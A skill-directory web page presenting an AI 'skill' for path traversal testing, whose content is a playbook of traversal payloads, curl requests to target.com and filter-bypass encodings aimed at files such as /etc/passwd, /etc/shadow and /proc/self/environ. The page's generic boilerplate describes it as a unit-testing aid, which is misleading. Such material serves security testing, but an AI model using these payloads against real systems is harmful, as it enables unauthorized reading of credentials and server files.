Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

File Path Traversal

File Path Traversal is an code AI skill with a core value of This skill should be used when the user asks to \"test for directory traversal\", \"exploit path traversal vulnerabilities\", \"read arbitrary files through web applications\", \"find LFI vu. It helps developers solve real-world problems in the code domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"test for directory traversal\", \"exploit path traversal vulnerabilities\", \"read arbitrary files through web applications\", \"find LFI vu...

Last verified on: 2026-07-07

Quick Facts

Category code
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level High
mkdir -p ./skills/file-path-traversal && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/file-path-traversal/SKILL.md -o ./skills/file-path-traversal/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# File Path Traversal Testing


Purpose


Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.


Prerequisites


Required Tools

- Web browser with developer tools

- Burp Suite or OWASP ZAP

- cURL for testing payloads

- Wordlists for automation

- ffuf or wfuzz for fuzzing


Required Knowledge

- HTTP request/response structure

- Linux and Windows filesystem layout

- Web application architecture

- Basic understanding of file APIs


Outputs and Deliverables


1. **Vulnerability Report** - Identified traversal points and severity

2. **Exploitation Proof** - Extracted file contents

3. **Impact Assessment** - Accessible files and data exposure

4. **Remediation Guidance** - Secure coding recommendations


Core Workflow


Phase 1: Understanding Path Traversal


Path traversal occurs when applications use user input to construct file paths:


php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);

Attack principle:

- `../` sequence moves up one directory

- Chain multiple sequences to reach root

- Access files outside intended directory


Impact:

- **Confidentiality** - Read sensitive files

- **Integrity** - Write/modify files (in some cases)

- **Availability** - Delete files (in some cases)

- **Code Execution** - If combined with file upload or log poisoning


Phase 2: Identifying Traversal Points


Map application for potential file operations:


bash
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=

Common vulnerable functionality:

- Image loading: `/image?filename=23.jpg`

- Template selection: `?template=blue.php`

- File downloads: `/download?file=report.pdf`

- Document viewers: `/view?doc=manual.pdf`

- Include mechanisms: `?page=about`


Phase 3: Basic Exploitation Techniques


#### Simple Path Traversal


bash
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts

# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd  # Double encoding

# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"

#### Absolute Path Injection


bash
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ

# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini

Phase 4: Bypass Techniques


#### Bypass Stripped Traversal Sequences


bash
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd

# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd

# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

#### Bypass Extension Validation


bash
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png

# Path truncation
../../../etc/passwd...............................

# Double extension
../../../etc/passwd.jpg.php

#### Bypass Base Directory Validation


bash
# When path must start with expected directory
/var/www/images/../../../etc/passwd

# Expected path followed by traversal
images/../../../etc/passwd

#### Bypass Blacklist Filters


bash
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/p

🎯 Best For

  • QA engineers
  • Developers writing unit tests
  • Claude users
  • Software engineers
  • Development teams

💡 Use Cases

  • Generating test cases for edge conditions
  • Writing integration test suites
  • Code quality improvement
  • Best practice enforcement

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply File Path Traversal to Your Work

    Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.

  4. 4

    Review and Refine

    Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.

❓ Frequently Asked Questions

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

Is File Path Traversal compatible with Cursor and VS Code?

Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.

Do I need specific dependencies for File Path Traversal?

Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.

How do I install File Path Traversal?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/file-path-traversal/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Skipping validation

Always test AI-generated code changes, even for simple refactors.

Missing dependency updates

Check if the skill requires updated dependencies or new packages.

🔗 Related Skills